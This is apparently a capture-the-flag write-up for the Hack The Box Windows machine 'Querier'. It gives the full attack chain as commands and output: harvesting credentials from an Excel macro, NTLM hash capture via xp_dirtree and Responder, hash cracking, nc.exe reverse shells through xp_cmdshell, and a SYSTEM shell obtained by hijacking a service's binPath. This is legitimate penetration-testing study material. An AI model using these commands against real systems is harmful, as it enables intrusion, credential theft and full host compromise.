Querier Writeup

06 May 2023 #CTF #HTB #box #medium #windows

querier info



$ sudo nmap -sC -sV
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds?
1433/tcp  open  ms-sql-s      Microsoft SQL Server 2017 14.00.1000.00; RTM
| ms-sql-info: 
|     Version: 
|       name: Microsoft SQL Server 2017 RTM
|       number: 14.00.1000.00
|       Product: Microsoft SQL Server 2017
|       Service pack level: RTM
|       Post-SP patches applied: false
|_    TCP port: 1433
| ms-sql-ntlm-info: 
|     Target_Name: HTB
|     NetBIOS_Domain_Name: HTB
|     NetBIOS_Computer_Name: QUERIER
|     DNS_Domain_Name: HTB.LOCAL
|     DNS_Computer_Name: QUERIER.HTB.LOCAL
|     DNS_Tree_Name: HTB.LOCAL
|_    Product_Version: 10.0.17763
|_ssl-date: 2023-05-06T15:18:23+00:00; 0s from scanner time.
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Issuer: commonName=SSL_Self_Signed_Fallback
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2023-05-06T15:04:38
| Not valid after:  2053-05-06T15:04:38
| MD5:   78b041938cf45306d13a118c01f8e0fd
|_SHA-1: 0891cf4987dddbfd7f07211707db9c7da051a800
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time: 
|   date: 2023-05-06T15:18:18
|_  start_date: N/A
| smb2-security-mode: 
|   311: 
|_    Message signing enabled but not required


Let's see if we can list shares anonymously:

$ smbclient -NL

        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        C$              Disk      Default share
        IPC$            IPC       Remote IPC
        Reports         Disk
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available

There is this 'Reports' share which is not default:

$ smbclient -N //
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Tue Jan 29 00:23:48 2019
  ..                                  D        0  Tue Jan 29 00:23:48 2019
  Currency Volume Report.xlsm         A    12229  Sun Jan 27 23:21:34 2019
smb: \> get "Currency Volume Report.xlsm"

Only 1 file on here, which is a Microsoft Excel document. The .xlsm extension suggests that macros are enabled.

Macro Analysis

We can run exiftool to confirm that this is indeed a macro enabled document:

$ exiftool 'Currency Volume Report.xlsm'
MIME Type         : application/vnd.ms-excel.sheet.macroEnabled.12
Creator           : Luis
Last Modified By  : Luis

We also get a potential username.

We'll use olevba from oletools to extract the macros from this document:

$ olevba 'Currency Volume Report.xlsm'
Set conn = New ADODB.Connection
conn.ConnectionString = "Driver={SQL Server};Server=QUERIER;Trusted_Connection=no;Database=volume;Uid=reporting;Pwd=PcwTWTHRwryjc$c6"
conn.ConnectionTimeout = 10

There is a database connection string in this macro with credentials used to access the MSSQL database we saw was open on port 1433.


Let's use impacket's mssqlclient to access the DB:

$ impacket-mssqlclient -windows-auth 'reporting:PcwTWTHRwryjc$c6@QUERIER'

We must use the -windows-auth flag in order to authenticate with the Windows account rather than a DB only account.

Let's take a look at the databases we have access to:

SQL> select name from sys.databases


Only this volume database is non-default. Let's see if it has any tables:

SQL> use volume
[*] ENVCHANGE(DATABASE): Old Value: volume, New Value: volume
[*] INFO(QUERIER): Line 1: Changed database context to 'volume'.
SQL> select table_name from information_schema.tables


Looks like it's completely empty.

We should also check if we are a db admin (so that we can run commands):

SQL> select IS_SRVROLEMEMBER('sysadmin')


But we are not.


Steal Hash

Another thing we can try is to make the DB authenticate to our box in order to crack its password. We'll use responder to do that:

$ sudo responder -I tun0

Now use the xp_dirtree command to list files inside of our fake share:

SQL> xp_dirtree '\\\asdf\asdf'

The share name and file name don't matter, we can put anything here.

We see the challenge response instantly in responder:

[SMB] NTLMv2-SSP Client   :
[SMB] NTLMv2-SSP Username : QUERIER\mssql-svc
[SMB] NTLMv2-SSP Hash     : mssql-svc::QUERIER:41586128dc6fe487:D6CA022726EB8A90BB6F01847EC4DDB5:0101000000000000001F6FEBE380D9010445F82672EEA3460000000002000800570043003900580001001E00570049004E002D003000420051004200450032005300330051004300450004003400570049004E002D00300042005100420045003200530033005100430045002E0057004300390058002E004C004F00430041004C000300140057004300390058002E004C004F00430041004C000500140057004300390058002E004C004F00430041004C0007000800001F6FEBE380D90106000400020000000800300030000000000000000000000000300000AEDB4694C82FFF306151BA2E748FD745CC843DB122E0674079741A67221E2BAD0A0010000000000000000000000000000000000009001E0063006900660073002F00310030002E00310030002E00310034002E003800000000000000000000000000

Copy this to a file and throw it to hashcat:

$ hashcat hash.txt /usr/share/wordlists/rockyou.txt

Abuse Service Account

Let's login again with our new account:

impacket-mssqlclient 'mssql-svc:corporate568@QUERIER' -windows-auth

Again, -windows-auth to use the local Windows account.

Let's once again check the access level:

SQL> select is_srvrolemember('sysadmin')


This time we have sysadmin privileges (not surprising since this is the MSSQL service account).

This means we can use xp_cmdshell to execute commands on the server. But first we need to enable it. Impacket's mssqlclient has a special command for that purpose:

SQL> enable_xp_cmdshell
[*] INFO(QUERIER): Line 185: Configuration option 'show advanced options' changed from 0 to 1. Run the RECONFIGURE statement to install.
[*] INFO(QUERIER): Line 185: Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install.

Now that it is enabled, we can use it:

SQL> xp_cmdshell whoami



To get a reverse shell, we'll use nc.exe (you can get it from here) which will be hosted on a SMB share using impacket's smbserver:

$ impacket-smbserver -smb2support -username asdf -password asdf public /opt/drop

/opt/drop is the directory where I store all tools that I might want to transfer.

Let's authenticate to our share:

SQL> xp_cmdshell net use \\\public /user:asdf asdf

The command completed successfully.


Now we can execute nc.exe from that share:

SQL> xp_cmdshell \\\public\nc.exe 443 -e cmd.exe


Running a privesc script like winpeas gives some interesting results:

C:\Documents and Settings\All Users\Application Data\Microsoft\Group Policy\History\{31B2F340-016D-11D2-945F-00C04FB984F9}\Machine\Preferences\Groups\Groups.xml
    Found C:\ProgramData\Microsoft\Group Policy\History\{31B2F340-016D-11D2-945F-00C04FB984F9}\Machine\Preferences\Groups\Groups.xml
    UserName: Administrator
    NewName: [BLANK]
    cPassword: MyUnclesAreMarioAndLuigi!!1!
    Changed: 2019-01-28 23:12:48
    Found C:\Documents and Settings\All Users\Application Data\Microsoft\Group Policy\History\{31B2F340-016D-11D2-945F-00C04FB984F9}\Machine\Preferences\Groups\Groups.xml
    UserName: Administrator
    NewName: [BLANK]
    cPassword: MyUnclesAreMarioAndLuigi!!1!
    Changed: 2019-01-28 23:12:48

    RmSvc: GenericExecute (Start/Stop)
    UsoSvc: AllAccess, Start

It found a password for the Administrator account in Group Policy Preference files. The password is actually encrypted but Microsoft published the AES key used to encrypt/decrypt these passwords (they do be like that sometimes):

$ evil-winrm -i -u administrator -p 'MyUnclesAreMarioAndLuigi!!1!'
*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami

We can also use psexec or wmiexec of course.

Interestingly, my crackmapexec (version 5.4.0 from Kali repos) didn't work with these creds:

$ crackmapexec winrm -u administrator -p 'MyUnclesAreMarioAndLuigi!!1!'
SMB    5985   QUERIER          [*] Windows 10.0 Build 17763 (name:QUERIER) (domain:HTB.LOCAL)
HTTP    5985   QUERIER          [*]
WINRM    5985   QUERIER          [-] HTB.LOCAL\administrator:MyUnclesAreMarioAndLuigi!!1!

$ crackmapexec smb -u administrator -p 'MyUnclesAreMarioAndLuigi!!1!'
SMB    445    QUERIER          [*] Windows 10.0 Build 17763 x64 (name:QUERIER) (domain:HTB.LOCAL) (signing:False) (SMBv1:False)
SMB    445    QUERIER          [-] HTB.LOCAL\administrator:MyUnclesAreMarioAndLuigi!!1! STATUS_NO_LOGON_SERVERS

Not sure why.

We also have full access to the UsoSvc service:

C:\>sc qc UsoSvc
sc qc UsoSvc
[SC] QueryServiceConfig SUCCESS

        TYPE               : 20  WIN32_SHARE_PROCESS
        START_TYPE         : 2   AUTO_START  (DELAYED)
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Windows\system32\svchost.exe -k netsvcs -p
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : Update Orchestrator Service
        DEPENDENCIES       : rpcss
        SERVICE_START_NAME : LocalSystem

We see that it runs as SYSTEM. To exploit this, we have to modify the binary path to execute nc.exe and restart it to get a reverse shell.

C:\>copy \\\public\nc.exe C:\ProgramData\nc.exe
C:\>sc.exe config UsoSvc binPath= "cmd.exe /c C:\ProgramData\nc.exe 1337 -e cmd.exe"
[SC] ChangeServiceConfig SUCCESS

C:\>sc.exe stop UsoSvc
        TYPE               : 30  WIN32
        STATE              : 3  STOP_PENDING
                                (NOT_STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN)
        WIN32_EXIT_CODE    : 0  (0x0)
        SERVICE_EXIT_CODE  : 0  (0x0)
        CHECKPOINT         : 0x3
        WAIT_HINT          : 0x7530

C:\>sc.exe start UsoSvc
[SC] StartService FAILED 1053:

The service did not respond to the start or control request in a timely fashion.

I couldn't find a way to make it execute nc.exe from our SMB share so I had to copy it to the box.

We get our shell right away:

nt authority\system

It's always a good idea to restore the service to its original state after exploiting it.

Key Takeaways